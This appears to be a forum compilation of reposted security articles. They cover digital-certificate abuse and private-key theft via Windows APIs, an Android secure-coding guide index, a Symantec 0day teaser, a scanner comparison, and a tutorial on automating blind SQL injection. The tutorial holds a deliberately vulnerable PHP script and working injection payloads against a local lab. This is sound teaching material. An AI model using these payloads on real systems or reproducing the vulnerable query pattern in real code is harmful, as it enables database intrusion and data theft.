entities, individuals and government organizations. The principal abuses of digital certificates observed by security experts: Man-in-the-middle (MITM) attacks Bad actors use digital certificates to eavesdrop on SSL/TLS traffic. Usually these attacks exploit the lack of strict controls by client applications when a server presents them with an SSL/TLS certificate signed by a trusted but unexpected Certification Authority. SSL certificates are the privileged mechanism for ensuring that secure web sites really are who they say they are. Typically, when we access a secure website, a padlock is displayed in the address bar. Before the icon appears, the site first presents a digital certificate, signed by a trusted “root” authority, that attests to its identity and encryption keys. Unfortunately web browsers, due to improper design and lack of efficient verification processes, accept the certificates issued by the trusted CA, even if it is an unexpected one. An attacker that is able to obtain a fake certificate from any certification authority and present it to the client during the connection phase can impersonate every encrypted web site the victim visits. “Most browsers will happily (and silently) accept new certificates from any valid authority, even for web sites for which certificates had already been obtained. An eavesdropper with fake certificates and access to a target’s internet connection can thus quietly interpose itself as a ‘man-in-the-middle’, observing and recording all encrypted web traffic traffic, with the user none the wiser.” Figure – MITM handshake Cyber attacks based on signed malware Another common cyber attack is based on malware signed with stolen code-signing certificates. The techniques allow attackers to improve avoidance techniques for their malicious codes. Once the private key associated with a trusted entity is compromised, it could be used to sign the malicious code of the malware. This trick allows an attacker to also install those software components (e.g. drivers, software updates) that require signed code for their installation/execution. One of the most popular cases was related to the data breach suffered by security firm Bit9. Attackers stole one of the company’s certs and used it to sign malware and serve it. The certificate was used to sign a malicious Java Applet that exploited a flaw in the browser of targeted browser. Malware installed illegitimate certificates Attackers could use also malware to install illegitimate certificates to trust them, avoiding security warnings. Malicious code could for example operate as a local proxy for SSL/TLS traffic, and the installed illegitimate digital certificates could allow attackers to eavesdrop on traffic without triggering any warning. The installation of a fake root CA certificate on the compromised system could allow attackers to arrange a phishing campaign. The bad actor just needs to set up a fake domain that uses SSL/TLS and passes certificate validation steps. Recently, Trend Micro has published a report on a hacking campaign dubbed “Operation Emmental”, which targeted Swiss bank accounts with a multi-faceted attack that is able to bypass two factor authentication implemented by the organization to secure its customers. The attackers, in order to improve the efficiency of their phishing schema, used a malware that installs a new root Secure Sockets Layer (SSL) certificate, which prevents the browser from warning victims when they land on these websites. Figure – Certificate installed by malware in MS store CAs issued improper certificates Improper certificates are issued by the CAs and hackers use them for cyber attacks. In one of the most blatant cases, DigiCert mistakenly sold a certificate to a non-existent company. the digital certificate was then used to sign malware used in cyber attacks. How to steal a digital certificate Malware is the privileged instrument for stealing a digital certificate and the private key associated with the victims. Experts at Symantec tracked different strains of malware which have the capability to steal both private keys and digital certificates from Windows certificate stores. This malicious code exploits the operating system’s functionality. Windows OS archives digital certificates in a certificate store. “Program code often uses the PFXExportCertStoreEx function to export certificate store information and save the information with a .pfx file extension (the actual file format it uses is PKCS#12).The PFXExportCertStoreEx function with the EXPORT_PRIVATE_KEYS option stores both digital certificates and the associated private keys, so the .pfx file is useful to the attacker,” states a blog post from Symantec. The CertOpenSystemStoreA function could be used to open certificates stored, meanwhile the PFXExportCertStoreEx function exports the content of the following certificate stores: MY: A certificate store that holds certificates with the associated private keys CA: Certificate authority certificates ROOT: Root certificates SPC: Software Publisher Certificates Invoking the PFXExportCertStoreEx function with the EXPORT_PRIVATE_KEYS option, it is possible to export both digital certificates and the associated private key. The code in the following image performs the following actions: Opens the MY certificate store Allocates 3C245h bytes of memory Calculates the actual data size Frees the allocated memory Allocates memory for the actual data size The PFXExportCertStoreEx function writes data to the CRYPT_DATA_BLOB area that pPFX points to Writes content of the certificate store. Figure – Malware code to access certificates info The experts noticed that a similar process is implemented by almost every malware used to steal digital certificates. Malicious code is used to steal certificate store information when the computer starts running. Once an an attacker has obtained the victim’s private key from a stolen certificate, it could use a tool like the Microsoft signing tool bundled with Windows DDK, Platform SDK, and Visual Studio. Running Sign Tool (signtool.exe), it is possible to digitally sign every code, including malware source code. Abuse prevention I desire to close this post introducing a couple of initiatives started to prevent the abuse of digital certificates. The first one is started by a security researcher at Abuse.ch, which has launched the SSL Black List, a project to create an archive of all the digital certificates used for illicit activities. Abuse.ch is a Swiss organization that was involved in the last years in many investigations on the principal major banker Trojan families and botnets. “The goal of SSLBL is to provide a list of bad SHA1 fingerprints of SSL certificates that are associated with malware and botnet activities. Currently, SSLBL provides an IP based and a SHA1 fingerprint based blacklist in CSV and Suricata rule format. SSLBL helps you in detecting potential botnet C&C traffic that relies on SSL, such as KINS (aka VMZeuS) and Shylock,” wrote the researcher in a blog post which introduces the initiative. The need to track abuse of certificates has emerged in recent years, after security experts discovered many cases in which bad actors abused digital certificates for illicit activities, ranging from malware distribution to Internet surveillance. Authors of malware are exploiting new methods to avoid detection by defense systems and security experts. For example, many attackers are using SSL to protect malicious traffic between C&C and infected machines. Each item in the list associates a certificate to the malicious operations in which attackers used it. The abuses include botnets, malware campaigns, and banking malware. The archive behind the SSL Black List, which actually includes more than 125 digital certificates, comprises SHA-1 fingerprints of each certificate with a description of the abuse. Many entries are associated with popular botnets and malware-based attacks, including Zeus, Shylock and Kins. The SSL Black List is another project that could help the security community to prevent cyber attacks. When the database matures, it will represent a precious resource for security experts dealing with malware and botnet operators that are using certificates in their operations. Abuse.ch isn’t the only entity active in the prevention of illicit activities of certificates. Google is very active in the prevention of any abuse of stolen or unauthorized digital certificates. Earlier this year, the company has its Certificate Transparency Project, a sort of a public register of digital certificates that have been issued. “Specifically, Certificate Transparency makes it possible to detect SSL certificates that have been mistakenly issued by a certificate authority or maliciously acquired from an otherwise unimpeachable certificate authority. It also makes it possible to identify certificate authorities that have gone rogue and are maliciously issuing certificates,” states the official page of the project. Unfortunately, many certificate authorities still aren’t providing logs to the public. References http://www.firmadigitalefacile.it/cosa-e-un-certificato-digitale/ http://securityaffairs.co/wordpress/647/cyber-crime/2011-cas-are-under-attack-why-steal-a-certificate.html http://hackmageddon.com/2011/12/10/another-certification-authority-breached-the-12th/ Turkey - Another story on use of fraudulent digital certificates - Security Affairs | Security Affairs http://securityaffairs.co/wordpress/222/cyber-crime/avoid-control-lets-digitally-sign-malware-code.html http://www.symantec.com/connect/blogs/diginotar-ssl-breach-update Adobe Code Signing Certificate used to sign malware, who to blame? - Security Affairs | Security Affairs SSL Blacklist a new weapon to fight malware and botnet | Security Affairs http://www.darkreading.com/attacks-and-breaches/stolen-digital-certificates-compromised-cia-mi6-tor/d/d-id/1099964? How Attackers Steal Private Keys from Digital Certificates | Symantec Connect How Digital Certificates Are Used and Misused Adobe Code Signing Certificate used to sign malware, who to blame? - Security Affairs | Security Affairs http://securityaffairs.co/wordpress/12264/cyber-crime/bit9-hacked-stolen-digital-certificates-to-sign-malware.html http://files.cloudprivacy.net/ssl-mitm.pdf http://securityaffairs.co/wordpress/4544/hacking/stuxnet-duqu-update-on-cyber-weapons-usage.html http://www.globalsign.com/company/press/090611-security-response.html http://www.wired.com/threatlevel/2011/10/son-of-stuxnet-in-the-wild/ Stuxnet signed certificates frequently asked questions - Securelist http://nakedsecurity.sophos.com/2011/11/03/another-certificate-authority-issues-dangerous-certficates/ http://www.f-secure.com/weblog/archives/00002269.html http://nakedsecurity.sophos.com/2011/12/08/second-dutch-security-firm-hacked-unsecured-phpmyadmin-implicated By Pierluigi Paganini|July 28th, 2014 Sursa: How Cybercrime Exploits Digital Certificates - InfoSec Institute
-
Android Application Secure Design/Secure Coding Guidebook 1. Introduction ................................................................................................................................ 9 1.1. Building a Secure Smartphone Society ................................................................................... 9 1.2. Timely Feedback on a Regular Basis Through the Beta Version ............................................. 10 1.3. Usage Agreement of the Guidebook .................................................................................... 11 2. Composition of the Guidebook .................................................................................................. 12 2.1. Developer's Context ............................................................................................................ 12 2.2. Sample Code, Rule Book, Advanced Topics .......................................................................... 13 2.3. The Scope of the Guidebook ............................................................................................... 16 2.4. Literature on Android Secure Coding ................................................................................... 17 2.5. Steps to Install Sample Codes into Eclipse ........................................................................... 18 3. Basic Knowledge of Secure Design and Secure Coding ............................................................... 34 3.1. Android Application Security ............................................................................................... 34 3.2. Handling Input Data Carefully and Securely ......................................................................... 47 4. Using Technology in a Safe Way ................................................................................................. 49 4.1. Creating/Using Activities .................................................................................................... 49 4.2. Receiving/Sending Broadcasts ............................................................................................. 93 4.3. Creating/Using Content Providers ..................................................................................... 126 4.4. Creating/Using Services .................................................................................................... 175 4.5. Using SQLite ..................................................................................................................... 219 4.6. Handling Files ................................................................................................................... 237 4.7. Using Browsable Intent ...................................................................................................... 264 4.8. Outputting Log to LogCat .................................................................................................. 268 4.9. Using WebView ................................................................................................................. 280 5. How to use Security Functions ................................................................................................. 291 5.1. Creating Password Input Screens ....................................................................................... 291 5.2. Permission and Protection Level ........................................................................................ 306 5.3. Add In-house Accounts to Account Manager ..................................................................... 334 5.4. Communicating via HTTPS ................................................................................................ 353 6. Difficult Problems ................................................................................................................... 375 6.1. Risk of Information Leakage from Clipboard ...................................................................... 375 Download: http://www.jssec.org/dl/android_securecoding_en.pdf
-
Symantec Endpoint Protection 0day In a recent engagement, we had the opportunity to audit a leading Antivirus Endpoint Protection solution, where we found a multitude of vulnerabilities. Some of these made it to CERT, while others have been scheduled for review during our upcoming AWE course at Black Hat 2014, Las Vegas. Ironically, the same software that was meant to protect the organization under review was the reason for its compromise. We’ll be publishing the code for this privilege escalation exploit in the next few days. In the meantime, you can check out our demo video of the exploitation process – best viewed in full screen. [h=5]More shameless Kali Dojo plugs[/h] If you’re attending the Black Hat, Brucon or Derbycon 2014 conferences, don’t forget to come by our free Kali Dojo Workshops for some serious Kali Linux fu. See you there! Sursa: http://www.offensive-security.com/vulndev/symantec-endpoint-protection-0day/
-
Automated vs hybrid vulnerability scanning A CIO’s experience Aleksandr Kirpo, CSO of the credit card processing Ukranian Processing Center You will have heard about programs that perform automated security scanning for website safety assessments. Such scanning software was developed in response to international standards such as PCI DSS and the security requirements they specify. While these scanners may be familiar to e-commerce firms, for owners of businesses where no such standards apply, the idea of security scanners may be new. There are many broadly similar security scanners available as a software or SaaS, and for the uninitiated it can be difficult to understand the differences or their strengths and weaknesses. Further, despite their apparent simplicity, for organisations that do not have a professional information security officer it can be incredibly difficult to make effective use of these systems and the reports they generate. It seems so simple: launch or order the scanner service, get the report and pass it to the development team for bug fixing. So what is the problem? There are actually two: Just like the automated antivirus programs we run on our desktops, automatic website scanners do not always discover all vulnerabilities. That said, if the website is very simple it is likely that the scanner will indeed find all the vulnerabilities, but for more complex websites such effectiveness cannot be guaranteed. Automatic scanners almost always report vulnerabilities that don’t actually exist on the website (false positives). Sadly, the more “clever” a scanner is, the longer it scans and the more false positive results are likely to be reported. So, can you get a report that reveals all the vulnerabilities and excludes false positives? Many IT security standards provide the answer and suggest using code reviews and penetration tests. The only problem with this approach is the price – it can be extremely high. There are few qualified professionals who can conduct code reviews and penetration tests reliably and such professionals are expensive. Not all scanners are created equal During my eighteen years in IT and IT-security, I have made use of many types of security and scanning services and have had the chance to compare the results from automatic scanners, hybrid scanners and penetration testing. Here I share three examples of using website security scanning software. When conducting a website assessment in 2013 we tried web security solutions from both Qualys and High-Tech Bridge. The output of these scans were a report from Qualys (100 pages) and one from High-Tech Bridge’s ImmuniWeb (15 pages). It was easy for me to read and understand each report, but knowing the shortcomings of automated scanners I was aware that the website could have multiple (critical) security vulnerabilities that the automatic scanners would not have found. The two solutions take a totally different approach: while Qualys is a fully automated scanner, High-Tech Bridge’s ImmuniWeb is a hybrid solution where the automated scanner is guided by a real person and completed by manual penetration testing by a security professional. In recent years, we found when scanning websites, that the Qualys scanner would stop responding. If, as we were, you are chasing standards compliance this can be a major headache because you are left without a compliance report or even some information that helps you understand the security level of the site. Of course there is technical support provided by scanner vendors – the last time I needed technical support from Qualys it took me about a month to get the issue resolved. High-Tech Bridge’s Portal support replied within a few hours. On another occasion we assessed a medium-sized website using IBM Rational AppScan. The final document from AppScan came to 850 pages and listed 36 vulnerabilities. Analysing the entire 850 page report and checking the website cost our developers about a month of effort and ultimately they reported that these vulnerabilities were not actually exploitable. Next, we ordered expensive manual penetration testing from a German company, the results of which showed that none of the vulnerabilities reported by AppScan existed and were all false-positives (needless to say, the testing cost a lot of money). Finally, we ordered an ImmuniWeb assessment for 639 USD (now the price is 990 USD). The assessment had only one recommendation, to use a trusted SSL certificate – a recommendation echoed by the developers and testers who conducted the penetration tests. This is a very good example how automated solutions can waste your time and money even if your web applications are safe. How intelligent are security scanners? A security professional reading a report generated by automatic scanners will recognise that the way these scanners work is through pattern matching. What’s wrong with that? Well, it means that any substantial deviation from the template will miss the vulnerability. A website owner should be aware that there are programmers who will leave vulnerabilities in the code on purpose, and some do it in a way that the scanners cannot detect. Even the most advanced automatic scanners need to match against a huge number of templates – this is probably why so many scanners take such a long time to complete a website scan. Pattern matching automated scanners have much in common with antivirus software. With antivirus software, the icon on your computer does not mean that there is no virus on your PC – it just means that the antivirus hasn’t recognised any viruses on your PC. The success of antivirus and automatic scanners depends on many factors such as the relevance of the software and pattern matching databases together with some mechanism for concluding that vulnerabilities (or viruses) are present. So, to be truly effective the fully-automated approach needs to be supplemented by an IT-security expert who can add human intelligence and professional experience to the process and ultimately give confidence that vulnerabilities will not go unnoticed during a security scan. Adding human intelligence is what Swiss company High-Tech Bridge did with its hybrid scanning approach1. Its innovative SaaS called ImmuniWeb combines automated scanning with manual testing – the scanning is done by a program and at the same time the results of the scanner are checked and completed by a professional who is qualified to carry out penetration tests. This expert can refine tasks for scanning immediately based on the website being assessed – eliminating false positive from the scanner report due to the involvement of the expert. Moreover, manual penetration testing guarantees the highest detection rate of vulnerabilities. It is interesting to note that the results of the low-cost hybrid assessment and expensive professional penetration tests, in certain cases, are the same. For example, say an open source based platform is used for the website. The expert is already aware of the known vulnerabilities of the platform at the time of scanning. So in the case of the hybrid approach, the expert need only find out the version of the platform being used and check its settings. Thus, the report will be specific to the platform used and contain only information relating to its vulnerabilities that really exist and are exploitable. If you have decided to check the security of your website quickly and economically, then you need to decide which scanner to choose: automatic with a huge report that in practice is never read until the end of the process or a hybrid with a brief report containing recommendations verified and completed by a security expert. What is the best way to check whether your website is secure? For firms building new websites or updating existing ones, here’s a list of factors to consider: 1. The specification you give to the developer should be prepared with the security in mind. The website developer: Should have good understanding of secure software development lifecycle, Pass regular web security trainings , Perform obligatory code reviews handled internally or by a third party company, Established IT-security processes in the company. Software testing at all stages includes testing for security issues. Ongoing maintenance of the website including improvements and updates, etc. Ensuring a credible and effective response to hacking, DoS, DDoS attacks. The infrastructure of your website should be properly protected. Beware of trusting your server host to secure your website. Hosting companies often make much noise about their security services (usually limited to one or more antivirus and malware-detection programs). However, such measures reduce the risk of an infrastructure breach but are absolutely insufficient for protecting a website as a separate software package. So when you need to check the security of your website, it means that you need scans and penetration tests of your web application not the infrastructure (that is also vital for website security but there is not so much vectors of infrastructure hacking and hardening). By the way, infrastructure security should be fully checked and assured by the hosting company – make sure it is mentioned in your contract. Sursa: Automated vs hybrid vulnerability scanning | ITsecurityITsecurity
-
Writing your own blind SQLi script We all know that sqlmap is a really great tool which has a lot of options that you can tweak and adjust to exploit the SQLi vuln you just found (or that sqlmap found for you). On rare occasions however you might want to just have a small and simple script or you just want to learn how to do it yourself. So let’s see how you could write your own script to exploit a blind SQLi vulnerability. Just to make sure we are all on the same page, here is the blind SQLi definition from OWASP: Blind SQL (Structured Query Language) injection is a type of SQL Injection attack that asks the database true or false questions and determines the answer based on the applications response. You can also roughly divide the exploiting techniques in two categories (like owasp does) namely: content based The page output tells you if the query was successful or not [*]time based Based on a time delay you can determine if your query was successful or not Of course you have dozens of variations on the above two techniques, I wrote about one such variation a while ago. For this script we are going to just focus on the basics of the mentioned techniques, if you are more interested in knowing how to find SQLi vulnerabilities you could read my article on Solving RogueCoder’s SQLi challenge. Since we are only focusing on automating a blind sql injection, we will not be building functionality to find SQL injections. Before we even think about sending SQL queries to the servers, let’s first setup the vulnerable environment and try to be a bit realistic about it. Normally this means that you at least have to login, keep your session and then inject. In some cases you might even have to take into account CSRF tokens which depending on the implementation, means you have to parse some HTML before you can send the request. This will however be out of scope for this blog entry. If you want to know how you could parse HTML with python you could take a look at my credential scavenger entry. If you just want the scripts you can find them in the example_bsqli_scripts repository on my github, since this is an entry on how you could write your own scripts all the values are hard coded in the script. The vulnerable environment Since we are doing this for learning purposes anyways, let’s create almost everything from scratch: sudo apt-get install mysql-server mysql-client sudo apt-get install php5-mysql sudo apt-get install apache2 libapache2-mod-php5 Now let’s write some vulnerable code and abuse the mysql database and it’s tables for our vulnerable script, which saves us the trouble of creating a test database. pwnme-plain.php <?php$username = "root"; $password = "root"; $link = mysql_connect('localhost',$username,$password); if(!$link){ die(mysql_error()); } if(!mysql_select_db("mysql",$link)){ die(mysql_error()); } $result = mysql_query("select user,host from user where user='" . $_GET['name'] . "'",$link); echo "<html><body>"; if(mysql_num_rows($result) > 0){ echo "User exists<br/>"; }else{ echo "User does not exist<br/>"; } if($_GET['debug'] === "1"){ while ($row = mysql_fetch_assoc($result)){ echo $row['user'] . ":" . $row['host'] . "<br/>"; } } echo "</html></body>"; mysql_free_result($result); mysql_close($link); ?> Like you can see if you give it a valid username it will say the user exists and if you don’t give it a valid username it will tell you the user doesn’t exist. If you need more information you can append a debug flag to get actual output. You probably also spotted the SQL injection which you can for example exploit like this: http://localhost/pwnme-plain.php?name=x' union select 1,2--+ Which results in the output: User exists and if you mess up the query or the query doesn’t return any row it will result in: User does not exist Sending and receiving data We are going to use the python package requests for this. If you haven’t heard it yet, it makes working with http stuff even easier than urllib2. If you happen to encounter weird errors with the requests library you might want to install the library yourself instead of using the one provided by your distro. To make a request using GET and getting the page content you’d use: print requests.get("http://localhost/pwnme-plain.php").text If you want to pass in parameters you’d do it like: urlparams = {'name':'root'} print requests.get("http://localhost/pwnme-plain.php",parameters=urlparams).text Which ensures that the parameters are automatically encoded. To make a request using POST you’d use: postdata = {'user':'webuser','pass':'webpass'} print requests.post("http://localhost/pwnme-login.php",data=postdata).text That’s all you need to start sending your SQLi payload and receiving the response. Content based automation For content based automation you basically need a query which will change the content based on the output of the query. You can do this in a lot of ways, here are two example: display or don’t display content id=1 and 1=if(substring((select @@version),1,1)=5,1,2) [*]display content based on the query output id=1 + substring((select @@version),1,1) For our automation script we will choose the first way of automating it, since it depends less on the available content. The first thing you need is a “universal” query which you use as the base to execute all your other queries. In our case this could be: root’ and 1=if(({PLACEHOLDER})=PLACEHOLDERVAR,1,2)–+ With the above query we can decide what we want to display. If you want display the wrong content we have to replace the PLACEHOLDER text and PLACEHOLDERVAR with something that will make the ‘if clause’ to choose ‘2’, for example: root’ and 1=if(substring((select @@version),1,1)=20,1,2)–+ Since there is no mysql version 20 this will lead to a query that ends up being evaluated as: root’ and 1=2 Which results in a False result, thus displaying the wrong content, in our case ‘User does not exist’. If on the other hand we want the query to display the good content we can just change it to: root’ and 1=if(substring((select @@version),1,1)=5,1,2)–+ Which of course will end up as: root’ and 1=1 Articol complet: Writing your own blind SQLi script | DiabloHorn